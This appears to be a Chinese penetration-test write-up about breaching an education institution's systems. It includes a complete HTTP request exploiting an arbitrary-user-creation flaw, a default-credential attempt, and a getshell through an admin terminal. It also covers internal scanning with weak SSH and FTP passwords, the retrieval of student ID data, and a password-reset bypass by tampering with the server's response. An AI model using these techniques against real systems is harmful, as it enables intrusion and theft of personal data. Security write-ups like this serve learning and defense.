記一次某edu單位的滲透

合天网安实验室發表於2024-03-08

0x01 資訊收集

第一步當然是從資訊收集開始,因為通常主域名基本不會含有高危漏洞。可以透過子域名->子域名埠掃描的方式去進行一個資訊收集用來提高攻擊面。這裡是用fofa進行攻擊面的擴大。(如果fofa脆弱系統較少可以自己爆破子域名+埠1-65535掃描的方式去進行滲透測試)。

記一次某edu單位的滲透

然後把資產去重,可以使用關鍵詞用來尋找一些存在漏洞機率高一些的系統。比如搜尋有登入的系統,可以新增body="登入"這種關鍵字去進行查詢。比如這裡是找到了一個日誌系統。

記一次某edu單位的滲透

也可以透過googlehack進行搜尋學號,身-份證之類的資訊。可以透過學號身-份證這些資訊用來登入某些系統,大部分的學校系統的口令格式是學號/身-份證後6位。(這裡隨便找一個案例)

202403081021511.png

202403081021512.png

202403081021513.png

0x02 命令執行

可以根據通用系統的歷史漏洞去對該系統進行滲透測試。

【----幫助網安學習,以下所有學習資料免費領!加vx:dctintin,備註 “部落格園” 獲取!】

 ① 網安學習成長路徑思維導圖
 ② 60+網安經典常用工具包
 ③ 100+SRC漏洞分析報告
 ④ 150+網安攻防實戰技術電子書
 ⑤ 最權威CISSP 認證考試指南+題庫
 ⑥ 超1800頁CTF實戰技巧手冊
 ⑦ 最新網安大廠面試題合集(含答案)
 ⑧ APP客戶端安全檢測指南(安卓+IOS)

首先嚐試預設口令進行登入 admin/panabit 未果。

記一次某edu單位的滲透

然後建議百度搜尋時間設定為一年內,可以省不少時間實際測試感覺一年之前的漏洞修復機率比較高。(可能是一年一次hvv的原因?)

記一次某edu單位的滲透

也可以用微信的公眾號搜尋,比較推薦,因為準確率比較高,都是一些新出的漏洞。

記一次某edu單位的滲透

然後使用任意使用者建立漏洞新增一個使用者

POST /singleuser_action.php HTTP/1.1
Host: xxxx
Cookie: xxxx
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="92"
Accept: */*
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: xxxx
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Length: 574
​
{ "syncInfo": { "user": { "userId": "001", "userName":
"001", "employeeId": "001", "departmentId": "001",
"departmentName": "001", "coporationId": "001",
"corporationName": "001", "userSex": "1", "userDuty": "001",
"userBirthday": "001", "userPost": "001", "userPostCode":
"001", "userAlias": "001", "userRank": "001", "userPhone":
"001", "userHomeAddress": "001", "userMobilePhone": "001",
"userMailAddress": "001", "userMSN": "001", "userNt": "001",
"userCA": "001", "userPwd": "001", "userClass": "001",
"parentId": "001", "bxlx": "001" },"operationType":
"ADD_USER" } }

成功登入後臺

記一次某edu單位的滲透

然後使用後臺命令執行進行getshell,成功進入內網。系統維護->終端命令

記一次某edu單位的滲透

0x03 內網滲透

首先使用fscan掃描一波內網。

其中有個ftp弱口令,這裡stuinfo.sql可能是某個資料庫的備份檔案。根據名字猜測是學生資訊的備份。

記一次某edu單位的滲透

下載之後匯入本地資料庫開啟,果然洩露了一堆身-份證,學號這些資訊。

記一次某edu單位的滲透

之後還在另外一個back資料夾中發現了另外一個xls表格,記一次某edu單位的滲透

ssh弱口令一堆,隨便

記一次某edu單位的滲透

h3c預設密碼登入

記一次某edu單位的滲透

0x04 任意密碼找回

這裡是另外一個外網系統。因為內網屬實是沒啥東西所以又得重新去外網找找有沒有其他漏洞。

確定存在使用者,輸入使用者名稱會傳送一個包,不存在使用者返回0,存在返回1記一次某edu單位的滲透

點選忘記密碼,隨便輸入密保問題跟答案。

記一次某edu單位的滲透

記一次某edu單位的滲透

Burp抓包,將驗證返回包中的false改為true。

記一次某edu單位的滲透

然後就發現跳轉到了修改密碼的頁面

記一次某edu單位的滲透

這時直接修改一波密碼,ok成功登入

記一次某edu單位的滲透

0x05 總結

主要內網的一些問題還是弱口令使用較多,而且老版本的漏洞基本不修復的問題。另外一提進行滲透測試必須獲得目標單位的合法授權,並且在合規框架下進行。在任何情況下,未經授權的滲透測試行為都是違法的,可能導致嚴重的法律後果。因此,在進行任何安全測試之前,請務必與目標單位達成明確的協議和授權。

更多網安技能的線上實操練習,請點選這裡>>

相關文章